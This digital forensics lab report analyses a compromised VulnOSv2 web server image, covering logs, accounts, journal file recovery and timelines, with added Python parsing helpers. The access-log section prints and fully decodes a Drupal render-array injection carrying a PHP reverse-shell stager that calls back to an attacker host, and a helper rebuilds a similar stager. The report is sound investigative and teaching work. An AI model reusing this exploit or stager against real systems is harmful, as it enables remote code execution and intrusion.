Forensics FJ

Summary: the system logs on the disk image were analysed to reconstruct user activity. The wtmp log showed the last login as the mail user on October 5 at 16:23 from IP 192.168.210.131. The btmp log recorded a run of failed login attempts, consistent with a brute-force attack. The auth log showed that the user vulnosadmin escalated to root and ran commands such as sudo /bin/cat shadow (from /etc, i.e. reading /etc/shadow). Login failures from other users were also present in the auth log.
DIGITAL FORENSICS AND

ANALYSIS
DISK | MEMORY | NETWORK | WINDOWS
FAIZAN JAVED
Digital Forensics And Analysis Faizan Javed

Table of Contents
1 Disk Forensics
  Lab Setup
  Initial Findings
    1.2.1 Expert Witness Format (EWF) for checking the file integrity
    1.2.2 Checking the contents of the volume system
    1.2.3 Creating the directories and mounting the file
    1.2.4 Checking LVM mappings and LVM contents
    1.2.5 Checking physical volume and setup
    1.2.6 Mounting the image to a folder
  Timezone
  Checking System Logs
  Users, Groups and Permissions
    1.5.1 Checking the passwd file
    1.5.2 Checking the shadow file
    1.5.3 Checking the groups
  Data Recovery / File Carving
  Generating a super timeline and filtering it
2 Memory Forensics
  Introduction to Memory Forensics
  Volatility
    2.2.1 Step one of memory forensics: getting memory info from the KDBG
    2.2.2 Running Volatility with a certain profile and different plugins
    2.2.3 Process and memory dumping: procdump / memdump
    2.2.4 Kernel module scanner: modscan
    2.2.5 Network connections scanning
  Introduction to Windows Memory Analysis


1 Disk Forensics
Lab Setup
For disk forensics we used Tsurugi Linux together with a previously acquired image of a web server (taken with FTK Imager in EWF/E01 format).


Initial Findings

1.2.1 Expert Witness Format (EWF) for checking the file integrity
To confirm the integrity of the acquired image, we verified the EWF container with the following command: ewfverify filename

ewfverify recomputes the hash over the stored data and compares it with the MD5 that was recorded in the E01 at acquisition time. The two matched, indicating that the imaged disk has not been modified since it was acquired.

1.2.2 Checking the contents of the volume system

To see how the disk is partitioned, we listed the volume system (partition table) with the following command: mmls filename

The volume of interest is the LVM partition (entry 006): this is a Linux machine whose root file system lives inside a logical volume rather than directly in a partition.

1.2.3 Creating the directories and mounting the file

We created two directories (ewf and case1) under /home/maximus/Desktop/ex-1filesystem. Everything produced during the analysis is written into these two directories.


Webserver.E01 is mounted in the ewf directory using the command ewfmount (ewfmount Webserver.E01 ewf/), which exposes the decompressed image as a raw, read-only device file inside that directory.

1.2.4 Checking LVM Mappings and LVM Contents

Using the commands below, we can see how the file system is mapped onto the disk through LVM. With -l, kpartx only lists the partition mappings it would create; with -a it creates a device-mapper entry for each partition, and -v prints each mapping as it is added.
kpartx -al path
kpartx -av path


Using the command lvdisplay, we can view the logical volume details. We are mainly interested in the name of the logical volume (root) and of the volume group it belongs to (VulnOSv2-vg), because the device path used for mounting is built from the two: /dev/VulnOSv2-vg/root. If that path does not appear, the volume group still has to be activated (vgchange -ay VulnOSv2-vg).
1.2.5 Checking Physical Volume & Setup
Using the command pvs, we verified the format and size of the physical volume: the format is lvm2 and the size is 31.26g.

Using the command dmsetup info, we confirmed that the device-mapper targets created for the partitions and for the logical volume are present and active.

Up to this point only the EWF container has been exposed (as a raw image under the ewf directory); the file system inside the logical volume is not yet mounted.

1.2.6 Mounting image to a folder

Now we mount the file system itself and inspect its contents. The logical volume was mounted on the case1 directory created earlier using the following command
mount -o ro,noatime,noexec,noload /dev/VulnOSv2-vg/root /path

ro → read only: nothing is written to the file system
noatime → do not update access timestamps on the files we read (redundant under ro, but explicit)


noload → ext4-specific: do not load (replay) the journal at mount time. Even a read-only mount would otherwise replay pending journal transactions and alter the evidence; skipping the replay also keeps the journal intact for the recovery step later on.
noexec → binaries on the image cannot be executed on the analysis host.

Checking the mount status with the command mount | grep case1

Finally, checking the contents of the mount with the command tree -L 1 path

The image is mounted successfully, as displayed in the screenshot above.

Timezone


The timezone is checked first so that the log timestamps can be correlated later. It must be read from the mounted image, not from the analysis workstation: cat case1/etc/timezone (the image may also carry it as the /etc/localtime symlink). Timestamps in auth.log and the Apache access log are written in this local time, whereas wtmp and btmp store epoch values that last renders in the analyst's own timezone unless TZ is set accordingly.

Checking System Logs


Logs in Linux are found in the /var/log directory. The ones to inspect here are syslog, auth.log, wtmp and btmp, among others.
• UTMP – /var/run/utmp records who is currently logged in, on which terminal and from where, together with system events and the boot time (used by uptime). On a dead image it reflects only the state at the last boot.
• WTMP – /var/log/wtmp is the historical record of the same data: successful logins, logouts and reboots.
• BTMP – /var/log/btmp records only failed login attempts.
These files are binary, so they cannot be read with cat; use last -f (or utmpdump) and point it at the copy on the mounted image rather than at the paths below on the analysis host:
last -f /var/log/wtmp | head -n 10
last -f /var/run/utmp | head -n 10
last -f /var/log/btmp | head -n 10
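The record format behind last -f, and the two checks the report performs on it (last successful login from wtmp, failed-login sources from btmp), as an added example that is not part of the original report. It assumes the glibc x86_64 struct utmp layout (384-byte records) and renders times in a fixed +02:00 offset (the CEST offset for the Europe/Brussels zone the report's timeline uses); the wtmp and btmp bytes are constructed test data that mirror the report's findings, not records taken from the image.

```python
"""Read Linux utmp/wtmp/btmp records the way `last -f` does, and summarise
the last successful login and the failed-login sources.

Added example, not part of the original report. It assumes the glibc x86_64
struct utmp layout (384-byte records) and a fixed +02:00 display offset; the
wtmp/btmp bytes below are constructed test data, not records from the image.
"""
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

# struct utmp (glibc, x86_64): ut_type, pad, ut_pid, ut_line[32], ut_id[4],
# ut_user[32], ut_host[256], ut_exit (2 x int16), ut_session, ut_tv.tv_sec,
# ut_tv.tv_usec, ut_addr_v6[4], 20 bytes reserved = 384 bytes
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)
LOGIN_PROCESS, USER_PROCESS, DEAD_PROCESS = 6, 7, 8   # ut_type values used here
DISPLAY_TZ = timezone(timedelta(hours=2))             # assumption: CEST (+0200)


def _cstr(raw: bytes) -> str:
    return raw.split(b"\0", 1)[0].decode("latin-1")


def parse_utmp(data: bytes) -> list:
    """Split a wtmp/btmp file into records; a trailing partial record is ignored."""
    records = []
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        records.append({
            "type": f[0], "pid": f[1], "line": _cstr(f[2]),
            "user": _cstr(f[4]), "host": _cstr(f[5]),
            "time": datetime.fromtimestamp(f[9], tz=timezone.utc),
        })
    return records


def last_login(records):
    """Newest USER_PROCESS record: what `last -f wtmp | head -n 1` shows."""
    logins = [r for r in records if r["type"] == USER_PROCESS]
    return max(logins, key=lambda r: r["time"]) if logins else None


def failed_logins_by_host(records, threshold=5):
    """btmp holds one LOGIN_PROCESS record per failure; return sources at/over the threshold."""
    counts = Counter(r["host"] or r["line"] for r in records if r["type"] == LOGIN_PROCESS)
    return {host: n for host, n in counts.items() if n >= threshold}


def make_record(utype, user, line, host, when, pid=1000):
    """Build one record in the same binary layout (used only for the constructed samples)."""
    return struct.pack(UTMP_FMT, utype, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, int(when.timestamp()), 0, 0, 0, 0, 0)


# Constructed wtmp: an admin ssh session in the morning, then the mail user
# from 192.168.210.131 at 16:23 local time on 5 October 2019.
SAMPLE_WTMP = b"".join([
    make_record(USER_PROCESS, "vulnosadmin", "pts/0", "192.168.56.101",
                datetime(2019, 10, 5, 9, 0, tzinfo=DISPLAY_TZ)),
    make_record(DEAD_PROCESS, "", "pts/0", "",
                datetime(2019, 10, 5, 9, 30, tzinfo=DISPLAY_TZ)),
    make_record(USER_PROCESS, "mail", "pts/1", "192.168.210.131",
                datetime(2019, 10, 5, 16, 23, tzinfo=DISPLAY_TZ)),
])
# Constructed btmp: eight failures for root from the same host within a minute.
SAMPLE_BTMP = b"".join(
    make_record(LOGIN_PROCESS, "root", "ssh:notty", "192.168.210.131",
                datetime(2019, 10, 5, 16, 20, 5 * i, tzinfo=DISPLAY_TZ))
    for i in range(8)
)


def summarize(wtmp: bytes = SAMPLE_WTMP, btmp: bytes = SAMPLE_BTMP) -> dict:
    """Last login plus brute-force candidates, as a dict a report can quote."""
    last = last_login(parse_utmp(wtmp))
    return {
        "last_user": last["user"] if last else None,
        "last_host": last["host"] if last else None,
        "last_time": last["time"].astimezone(DISPLAY_TZ).strftime("%b %d %H:%M") if last else None,
        "brute_force_sources": failed_logins_by_host(parse_utmp(btmp)),
    }


if __name__ == "__main__":
    print(summarize())
```

On a real case, pass open("case1/var/log/wtmp", "rb").read() and the btmp equivalent to summarize(); the threshold in failed_logins_by_host is the only tuning knob, and DEAD_PROCESS records (logouts) carry an empty user, which is why last_login filters on USER_PROCESS only.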

First, we look at the wtmp log using the command last -f case1/var/log/wtmp | head -n 30

The screenshot above tells us that the last user to log in was the mail user, on October 5 at 16:23, from IP address 192.168.210.131. A successful interactive login by the mail account is itself suspicious: this service account normally has no login shell (see the passwd analysis below).


Next we look at the failed logins in btmp with the command last -f case1/var/log/btmp | head -n 30

The screenshot above lists the users who failed to log in. The volume and timing of the failures point to a brute-force attack.

Then we checked the authentication log with the command cat case1/var/log/auth.log. It records both successful and failed authentications, privilege escalations (su/sudo) and the commands run through them.

We observed that the user vulnosadmin escalated its rights to the superuser (root):
Apr 3 18:41:15 VulnOSv2 sudo: pam_unix(sudo:session): session opened for user root by vulnosadmin(uid=0)

The user vulnosadmin issued the command sudo /bin/cat shadow with /etc as the working directory, i.e. it read /etc/shadow, the password hashes:


Apr 3 18:52:39 VulnOSv2 sudo: vulnosadmin : TTY=tty1 ; PWD=/etc ; USER=root ; COMMAND=/bin/cat shadow

Login failures from other users were also observed:


Apr 3 18:16:55 VulnOSv2 login[982]: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0
tty=/dev/tty1 ruser= rhost=
Apr 3 18:51:46 VulnOSv2 login[886]: FAILED LOGIN (1) on '/dev/tty1' FOR 'UNKNOWN', Authentication failure

The large number of failed attempts supports the brute-force theory (the dates match those seen in the btmp log). Note that these auth.log entries are on tty1 (the local console) with an empty rhost, whereas the October 5 activity in wtmp came over the network from 192.168.210.131; the two should be treated as separate events in the timeline.


Successful logins are recorded in auth.log as well (sshd logs them as "Accepted"). This was verified with the following command:
grep Accepted /home/maximus/Desktop/ex-1filesystem/case1/var/log/auth.log

Connections that were closed before authentication completed are tagged "[preauth]" by sshd; such entries are typical of scanners and brute-force tools. Two IP addresses appear in them:
grep preauth /home/maximus/Desktop/ex-1filesystem/case1/var/log/auth.log

Finally, lastlog was inspected. It is a binary file (one fixed-size record per UID, holding the last login time, terminal and host), so strings only recovers the terminal and host fields:

root@Tsurugi:/home/maximus/Desktop/ex-1filesystem# strings /home/maximus/Desktop/ex-1filesystem/case1/var/log/lastlog
(the output shows records for tty1, for pts/1 from 192.168.210.131 and for pts/0 from 192.168.56.101)

Users, Groups and Permissions


1.5.1 Checking the passwd file
Using the command cat case1/etc/passwd, we checked the UID, primary group, home directory and login shell assigned to each user.

Understanding the fields, using the root entry as an example:

root(username):x(password is stored in /etc/shadow):0(UID):0(GID):root(comment/GECOS):/root(home directory):/bin/bash(login shell)


From the screenshot above we observed that the users php, mail (the mail account normally has no login shell) and vulnosadmin all have shell access. We then narrowed the search down to the users who have shell access.

A login shell of /bin/bash means the user can log in interactively; the following users are granted it.

From the passwd entries (cat case1/etc/passwd) we can see that the user php has the home directory /usr/php.

The home directory of the php user contains hidden dot-files, including the bash start-up file .bashrc. The presence of these files indicates that the account has been set up for, and most likely used in, interactive bash sessions.

Similarly, the user mail has the home directory /var/mail. Looking at the contents of this home directory:


Looking at the contents of .bash_history, which holds the commands this user has executed.

Attackers usually delete or truncate this file to remove their traces, so finding it intact is itself worth noting.

From the commands recorded we can see that this user was able to escalate privileges. The password of the user php was also changed.

When the attacker switches to root (using the su command), subsequent commands are written to root's own history file (/root/.bash_history). Let's check that out.


Let's see the contents of that .bash_history file.

1.5.2 Checking the Shadow File

Using the command cat case1/etc/shadow we can check the salted password hashes. The first field is the username and the second the hashed password; a "*" or "!" in the second field means the account has no usable password (locked). The third field is the date of the last password change, in days since 1970-01-01, which is how a recent change such as the one on the php account can be dated and placed on the timeline.

From the screenshot above, we can see that the users root, mail, vulnosadmin, webmin and php have a password set.

1.5.3 Checking the groups.


Using the command cat case1/etc/group we can see which users have sudo access (members of the sudo group) and which supplementary groups each user belongs to.
maximus@Maximus:~/Desktop$ sudo cat ex-1filesystem/case1/etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,vulnosadmin
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:vulnosadmin
floppy:x:25:
tape:x:26:
sudo:x:27:php,mail
audio:x:29:
dip:x:30:vulnosadmin
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:vulnosadmin
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
netdev:x:102:
crontab:x:103:
syslog:x:104:
fuse:x:105:
messagebus:x:106:


mlocate:x:107:
ssh:x:108:
landscape:x:109:
vulnosadmin:x:1000:
lpadmin:x:110:vulnosadmin
sambashare:x:111:vulnosadmin
ssl-cert:x:112:postgres
mysql:x:113:
webmin:x:1001:
postfix:x:114:
postdrop:x:115:
postgres:x:116:
php:x:999:
From the listing above we can see that the users php and mail are members of the sudo group, so both can run commands as root. vulnosadmin is a member of several groups (adm, cdrom, dip, plugdev, lpadmin, sambashare), which is the normal set for the first user created at install time; sudo membership for the php and mail service accounts is not normal and is a persistence indicator.
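The checks made by hand in 1.5.1 to 1.5.3 (interactive shells on service accounts, sudo group membership, usable password hashes, date of the last password change), as an added example that is not the report's own code. The three file bodies are constructed to mirror the accounts the report discusses (php, mail, vulnosadmin, webmin) with placeholder hashes; on a real case the contents come from case1/etc/passwd, case1/etc/shadow and case1/etc/group on the mounted image.

```python
"""Audit the account files from a mounted image: who can log in, who can sudo,
who has a usable password, and when passwords last changed.

Added example, not the report's own code. The file bodies below are
constructed to mirror the accounts the report discusses; the hashes are
placeholders. Read the real files from the mount point on an actual case.
"""
from datetime import date, timedelta

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync", ""}
SYSTEM_UID_MAX = 999  # Debian/Ubuntu convention: UIDs below 1000 are system accounts
EPOCH = date(1970, 1, 1)

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
vulnosadmin:x:1000:1000:VulnOS admin,,,:/home/vulnosadmin:/bin/bash
webmin:x:1001:1001::/home/webmin:/bin/bash
php:x:999:999::/usr/php:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$placeholder$hash:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
mail:$6$placeholder$hash:18173:0:99999:7:::
www-data:*:18000:0:99999:7:::
vulnosadmin:$6$placeholder$hash:18000:0:99999:7:::
webmin:$6$placeholder$hash:18000:0:99999:7:::
php:$6$placeholder$hash:18173:0:99999:7:::
"""
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,vulnosadmin
mail:x:8:
sudo:x:27:php,mail
vulnosadmin:x:1000:
webmin:x:1001:
php:x:999:
"""


def parse_colon_file(text, fields):
    """Parse a colon-separated account file into dicts keyed by the given field names."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        rows.append(dict(zip(fields, line.split(":"))))
    return rows


def password_usable(hash_field):
    """Empty, '*' and '!'-prefixed (locked) entries cannot be used to log in."""
    return bool(hash_field) and not hash_field.startswith(("*", "!"))


def audit(passwd_text, shadow_text, group_text):
    """Return the findings an analyst would otherwise read off the three files by eye."""
    passwd = parse_colon_file(passwd_text,
                              ["name", "pw", "uid", "gid", "gecos", "home", "shell"])
    shadow = parse_colon_file(shadow_text, ["name", "hash", "changed"])
    groups = parse_colon_file(group_text, ["name", "pw", "gid", "members"])

    sudo = next((g for g in groups if g["name"] == "sudo"), None)
    sudo_members = [m for m in sudo["members"].split(",") if m] if sudo else []
    # A user whose *primary* group is sudo is not listed in /etc/group, so check passwd too.
    sudo_members += [u["name"] for u in passwd
                     if sudo and u["gid"] == sudo["gid"] and u["name"] not in sudo_members]

    interactive = [u["name"] for u in passwd if u["shell"] not in NOLOGIN_SHELLS]
    service_with_shell = [u["name"] for u in passwd
                          if u["shell"] not in NOLOGIN_SHELLS
                          and 0 < int(u["uid"]) <= SYSTEM_UID_MAX]
    extra_uid0 = [u["name"] for u in passwd if u["uid"] == "0" and u["name"] != "root"]
    password_set = [s["name"] for s in shadow if password_usable(s["hash"])]
    changed = {s["name"]: (EPOCH + timedelta(days=int(s["changed"]))).isoformat()
               for s in shadow if s.get("changed", "").isdigit()}
    return {
        "interactive": interactive,
        "service_accounts_with_shell": service_with_shell,
        "sudo_members": sudo_members,
        "extra_uid0": extra_uid0,
        "password_set": password_set,
        "password_changed": changed,
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_PASSWD, SAMPLE_SHADOW, SAMPLE_GROUP).items():
        print(f"{key}: {value}")
```

The service_accounts_with_shell and sudo_members lists are the two findings that matter on this image (mail and php in both), and password_changed turns the shadow day counter into a calendar date that can be matched against the wtmp and auth.log activity.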

Data Recovery / File Carving

Returning to the contents of .bash_history.

From the commands above we can see that a PHP script, update.php, was edited. Let's check out that script.

Seeing the contents of the script using the command less update.php


This is a web shell, and its payload is a cryptominer. Next we want to find out how the threat actor gained access.

We saw that the application running was Drupal (a content management system) and found its version in the update.inc file.

Next we check the web server access logs, located at /var/log/apache2/access.log. We focus on the day the activity occurred, 5 October. POST requests are of particular interest, since form submissions are where injection payloads arrive. Note that grep is case-sensitive, so the request method has to be matched in upper case:
cat access.log | grep POST
192.168.210.131 - - [05/Oct/2019:13:01:27 +0200] "POST /jabc/?q=user/password&name%5b%23post_render%5d%5b%5d=assert&name%5b%23markup%5d=eval%28base64_decode%28Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMjEwLjEzMSc7ICRwb3J0ID0gNDQ0NDsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFjaygiTmxlbiIsICRsZW4pOyAkbGVuID0gJGFbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmIGluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9mdW5jdGlvbignJywgJGIpOyAkc3Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7%29%29%3b&name%5b%23type%5d=markup HTTP/1.1" 200 13983 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


The POST payload is base64-encoded inside a URL-encoded query string, so it has to be URL-decoded first (%28 is "(", %29 is ")", %3b is ";") and only then base64-decoded. The report used two web services for this:
1) https://www.base64decode.org (decodes the base64).
2) https://www.unphp.net/decode (UnPHP is a free service for analysing obfuscated and malicious PHP code).
Be aware that pasting evidence into public web services discloses case data (the attacker's IP address, the target path) to a third party; the same decoding can be done offline with base64 -d or a local CyberChef instance. Decoding the base64 portion of the POST above gives:
/*<?php /**/ error_reporting(0); $ip = '192.168.210.131'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

(The unreadable bytes that appeared before and after the PHP in the raw decode come from feeding the still URL-encoded eval%28base64_decode%28 ... %29%29 wrapper to the base64 decoder along with the payload; they are not part of it.)

Running the decoded text through the second service only reformats it; the logic is already readable. The stager connects back to 192.168.210.131 on TCP port 4444, reads a 4-byte big-endian length followed by that many bytes of PHP, and eval()s them: a staged reverse-shell loader, with a create_function fallback for hosts where Suhosin disables eval.

Now we know how the attacker gained access: not through a generic PHP flaw but through a Drupal vulnerability. The request targets the password-reset form (q=user/password) and injects Form API render-array properties (name[#post_render][]=assert together with name[#markup]=eval(...)), so that Drupal itself calls assert() on the attacker's PHP while rendering the form.
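The decoding done above by hand, as an added example that is not the report's code: parse the access-log line, URL-decode the query, pull the base64 out of the eval(base64_decode(...)) wrapper, and extract the callback address from the PHP. The log line is constructed in the same shape as the logged one (POST to /jabc/?q=user/password with name[#post_render][]=assert and name[#markup]=eval(...)) but carries a shortened stager so that it fits here; the callback IP and port are the ones the report decoded, and the function and regex names are this example's own.

```python
"""Decode a Drupal Form API render-array injection from an Apache access-log line.

Added example, not the report's code. The log lines below are constructed;
the stager is shortened from the one the report decoded but keeps the same
callback (192.168.210.131:4444) and read-length-then-eval structure.
"""
import base64
import re
from urllib.parse import unquote, urlsplit

# Constructed stager in the style of the decoded payload: connect back, read a
# 4-byte big-endian length, read that many bytes of PHP, eval() them.
STAGER_PHP = (
    "/*<?php /**/ error_reporting(0); $ip = '192.168.210.131'; $port = 4444; "
    "$s = fsockopen($ip, $port); $len = fread($s, 4); $a = unpack('Nlen', $len); "
    "$b = fread($s, $a['len']); eval($b); die();"
)

CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d+)'
)
EVAL_RE = re.compile(r"eval\(base64_decode\(([A-Za-z0-9+/=]+)\)\)")
CALLBACK_RE = re.compile(r"\$ip\s*=\s*'([^']+)'\s*;\s*\$port\s*=\s*(\d+)")


def build_request_line(stager=STAGER_PHP):
    """Constructed combined-log-format line with the same percent-encoding as the real entry."""
    b64 = base64.b64encode(stager.encode()).decode()
    query = ("q=user/password&name%5b%23post_render%5d%5b%5d=assert"
             f"&name%5b%23markup%5d=eval%28base64_decode%28{b64}%29%29%3b"
             "&name%5b%23type%5d=markup")
    return (f'192.168.210.131 - - [05/Oct/2019:13:01:27 +0200] "POST /jabc/?{query} HTTP/1.1" '
            '200 13983 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"')


def decode_request(line):
    """Return the parsed request, the injected PHP and its callback, or None if the line is not CLF."""
    m = CLF_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    # unquote rather than parse_qs: parse_qs would turn '+' inside the base64 into
    # spaces and split on the '=' padding characters.
    query = unquote(urlsplit(target).query)
    form = re.search(r"(?:^|&)q=([^&]*)", query)
    blobs = EVAL_RE.findall(query)
    php = base64.b64decode(blobs[0]).decode("latin-1") if blobs else ""
    cb = CALLBACK_RE.search(php)
    return {
        "source": m.group("src"),
        "method": m.group("method"),
        "status": int(m.group("status")),
        "path": urlsplit(target).path,
        "form": form.group(1) if form else None,
        # Both properties together are the signature of the render-array injection.
        "render_array_injection": "[#post_render][]=assert" in query and "[#markup]=" in query,
        "payload": php,
        "callback": (cb.group(1), int(cb.group(2))) if cb else None,
    }


def find_injections(lines):
    """Scan many log lines and keep only the ones carrying the injection."""
    hits = [decode_request(line) for line in lines]
    return [h for h in hits if h and h["render_array_injection"]]


# Constructed sample log: one ordinary page view and the exploit request.
SAMPLE_LOG = [
    '192.168.56.101 - - [05/Oct/2019:12:58:03 +0200] "GET /jabc/?q=node/1 HTTP/1.1" 200 8021 "-" "Mozilla/5.0"',
    build_request_line(),
]

if __name__ == "__main__":
    for hit in find_injections(SAMPLE_LOG):
        print(hit["source"], hit["form"], hit["callback"])
        print(hit["payload"][:80])
```

Run find_injections over the lines of case1/var/log/apache2/access.log to get every request of this shape with its decoded callback, which is the list of attacker infrastructure to search for in the other logs; the render_array_injection flag is deliberately independent of the payload encoding, so a variant that does not use base64 is still reported.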

From the bash_history, the attacker went to the /tmp folder and deleted 37292.c.

Deleted data can be recovered as long as its blocks have not been overwritten. Different tools exist for this, such as FTK, foremost and Autopsy; here we use the ext4 journal instead.
This is an ext4 file system, and ext4 keeps a journal: metadata blocks (and, depending on the journaling mode, data blocks) are written to the journal before being committed to their final location, so that the file system stays consistent after a crash or abrupt shutdown. As a side effect the journal holds recent copies of inode tables and directory blocks, including the inodes of files that were deleted shortly afterwards, which is what ext4magic uses to restore them. The journal lives in inode number 8 by default. We extract it with debugfs:
sudo debugfs -R 'dump <8> ./journal' /dev/VulnOSv2-vg/root


journal is a binary data file. We can check the file type using the command file journal

This is a 128M file.

Now, using the ext4magic tool, we recover the deleted data from the journal into an output directory. This can be done in two ways:
i. Recover everything the journal knows about under the directory
sudo ext4magic /dev/VulnOSv2-vg/root -f tmp -j journal -M -d output2/

(-j names the journal dump, -M recovers all recoverable files, -d is the output directory, and the path given to -f is relative to the root of the image file system, so /tmp on the image is written as tmp, not as a path under the mount point.)

ii. Recover only data from after a certain date

Step 1: Create a variable (e.g. after) holding the start of the time window as an epoch timestamp
$ after=$(date -d"-20days" +%s)
Step 2: pass it to ext4magic with the -a (after) option
$ sudo ext4magic /dev/VulnOSv2-vg/root -a $after -f tmp -j journal -M -d output2/


What is 37292.c exactly?

Generating a super timeline and filtering it

i. Generating the timeline with the plaso log2timeline tool. The command below writes an unsorted plaso storage file named timeline.case1; the -z value should be the timezone found earlier in case1/etc/timezone, so that timestamps from logs that carry no zone are interpreted correctly.
sudo log2timeline.py -z timezoneValue -t / --parsers linux,apache_access,apt_history timeline.case1 case1/

ii. Sorting and exporting the generated timeline

sudo psort.py -z Europe/Brussels -o L2tcsv -w webserver.csv timeline.case1
"date
This creates a new CSV file named webserver.csv, which can be viewed in MS Office or LibreOffice (or filtered on its date, source and description columns with grep and awk).


2 Memory Forensics
Introduction to Memory Forensics
- Memory acquisition tools: FTK Imager, DumpIt, Belkasoft Live RAM Capturer, winpmem.
- Memory forensic tools: Redline (a Windows memory forensics tool from FireEye; GUI-driven but less capable) and Volatility (command line, but more capable).

Volatility
2.2.1 Step One of memory forensics – Getting memory info from KDBG
The first step is to run the imageinfo plugin so that Volatility can make a best guess at the memory profile (OS version and architecture) needed to parse the image. To do this Volatility searches for the Kernel Debugger Block (KDBG), a structure the Windows kernel maintains for debuggers that also points to the kernel base and the head of the process list.
Command: volatility -f filename imageinfo

From the snippet above we can see that the suggested profiles are WinXPSP2 and WinXPSP3 (Windows XP, Service Pack 2 or 3). When several profiles are suggested, kdbgscan confirms which one actually matches the KDBG found in the image.


2.2.2 Running the volatility with a certain profile and different plugins
Once the profile is known, we run Volatility with that profile and the plugin of choice using the command volatility -f filename --profile=profile-name plugin.

Plugin Description
autoruns Searches the registry and memory space for applications running at
system startup and maps them to running processes
